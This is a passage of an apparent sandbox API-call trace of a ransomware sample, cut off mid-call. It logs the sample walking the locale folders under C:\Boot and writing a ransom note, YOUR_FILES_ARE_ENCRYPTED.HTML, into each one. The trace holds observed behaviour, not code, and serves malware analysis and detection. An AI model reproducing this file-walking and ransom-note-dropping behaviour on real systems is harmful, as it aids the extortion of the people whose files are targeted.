pszDest="\\\\?\\C:\\Boot\\fr-CA\\bootmgr.exe.mui") returned 33 [0104.549] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.549] lstrlenW (lpString=".mui") returned 4 [0104.549] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.550] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789d0a50, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789d0a50, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13560, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0104.550] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0104.550] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\fr-CA\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.550] GetProcessHeap () returned 0x600000 [0104.550] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.550] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-CA\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\fr-ca\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.550] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.551] CloseHandle (hObject=0x300) returned 1 [0104.552] GetProcessHeap () returned 0x600000 [0104.552] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.552] GetProcessHeap () returned 0x600000 [0104.552] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.552] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0104.552] StrStrIW (lpFirst="fr-FR", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.552] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR") returned 17 [0104.552] GetProcessHeap () returned 0x600000 [0104.552] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.553] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\fr-FR" | out: lpString1="\\\\?\\C:\\Boot\\fr-FR") returned="\\\\?\\C:\\Boot\\fr-FR" [0104.553] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\fr-FR", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\fr-FR\\*") returned="\\\\?\\C:\\Boot\\fr-FR\\*" [0104.553] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fr-FR\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0104.554] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.554] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2096e751, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13558, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.554] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.554] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 33 [0104.554] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.554] lstrlenW (lpString=".mui") returned 4 [0104.554] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.554] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb360, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0104.554] StrStrIW (lpFirst="memtest.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.554] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\memtest.exe.mui") returned 33 [0104.554] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.554] lstrlenW (lpString=".mui") returned 4 [0104.554] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.554] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x21107f25, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb360, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0104.554] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0104.554] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.554] GetProcessHeap () returned 0x600000 [0104.554] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.555] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\fr-fr\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.556] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.557] CloseHandle (hObject=0x300) returned 1 [0104.557] GetProcessHeap () returned 0x600000 [0104.557] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.557] GetProcessHeap () returned 0x600000 [0104.557] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.557] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0104.558] StrStrIW (lpFirst="hr-HR", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.558] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\hr-HR") returned 17 [0104.558] GetProcessHeap () returned 0x600000 [0104.558] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.558] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\hr-HR" | out: lpString1="\\\\?\\C:\\Boot\\hr-HR") returned="\\\\?\\C:\\Boot\\hr-HR" [0104.558] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\hr-HR", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\hr-HR\\*") returned="\\\\?\\C:\\Boot\\hr-HR\\*" [0104.559] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\hr-HR\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0104.559] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.559] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.559] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.559] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\hr-HR\\bootmgr.exe.mui") returned 33 [0104.559] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.559] lstrlenW (lpString=".mui") returned 4 [0104.559] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.559] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0104.559] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0104.559] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\hr-HR\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.559] GetProcessHeap () returned 0x600000 [0104.559] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.559] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hr-HR\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\hr-hr\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.560] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.560] CloseHandle (hObject=0x300) returned 1 [0104.561] GetProcessHeap () returned 0x600000 [0104.561] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.561] GetProcessHeap () returned 0x600000 [0104.561] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.561] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0104.561] StrStrIW (lpFirst="hu-HU", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.561] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU") returned 17 [0104.561] GetProcessHeap () returned 0x600000 [0104.561] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.563] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\hu-HU" | out: lpString1="\\\\?\\C:\\Boot\\hu-HU") returned="\\\\?\\C:\\Boot\\hu-HU" [0104.563] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\hu-HU", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\hu-HU\\*") returned="\\\\?\\C:\\Boot\\hu-HU\\*" [0104.563] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\hu-HU\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0104.564] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.564] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13360, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.564] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.564] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 33 [0104.564] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.564] lstrlenW (lpString=".mui") returned 4 [0104.564] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.564] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb360, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0104.564] StrStrIW (lpFirst="memtest.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.564] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\memtest.exe.mui") returned 33 [0104.564] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.564] lstrlenW (lpString=".mui") returned 4 [0104.564] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.564] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb360, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0104.564] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0104.564] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.564] GetProcessHeap () returned 0x600000 [0104.564] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.564] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\hu-hu\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0104.565] WriteFile (in: hFile=0x300, lpBuffer=0x681350*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f3f4, lpOverlapped=0x0 | out: lpBuffer=0x681350*, lpNumberOfBytesWritten=0x19f3f4*=0x3c00, lpOverlapped=0x0) returned 1 [0104.566] CloseHandle (hObject=0x300) returned 1 [0104.566] GetProcessHeap () returned 0x600000 [0104.567] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x681350 | out: hHeap=0x600000) returned 1 [0104.567] GetProcessHeap () returned 0x600000 [0104.567] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x671348 | out: hHeap=0x600000) returned 1 [0104.567] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19f43c | out: lpFindFileData=0x19f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x57e5177c, dwReserved1=0x130, cFileName="it-IT", cAlternateFileName="")) returned 1 [0104.567] StrStrIW (lpFirst="it-IT", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.567] wnsprintfW (in: pszDest=0x660338, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\it-IT") returned 17 [0104.567] GetProcessHeap () returned 0x600000 [0104.567] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0104.568] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\Boot\\it-IT" | out: lpString1="\\\\?\\C:\\Boot\\it-IT") returned="\\\\?\\C:\\Boot\\it-IT" [0104.568] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\it-IT", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Boot\\it-IT\\*") returned="\\\\?\\C:\\Boot\\it-IT\\*" [0104.568] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\it-IT\\*", lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0104.568] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x789f6c92, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="..", cAlternateFileName="")) returned 1 [0104.569] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d58, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0104.569] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.569] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\bootmgr.exe.mui") returned 33 [0104.569] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.569] lstrlenW (lpString=".mui") returned 4 [0104.569] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0104.569] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2109581d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb158, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0104.569] StrStrIW (lpFirst="memtest.exe.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0104.569] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\memtest.exe.mui") returned 33 [0104.569] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.569] lstrlenW (lpString=".mui") returned 4 [0104.569] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0104.569] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x789f6c92, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x789f6c92, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2109581d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb158, dwReserved0=0x0, dwReserved1=0x19f200, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0104.569] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0104.569] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\it-IT\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0104.569] GetProcessHeap () returned 0x600000 [0104.569] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x681350 [0104.569] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\it-IT\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\it-it\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 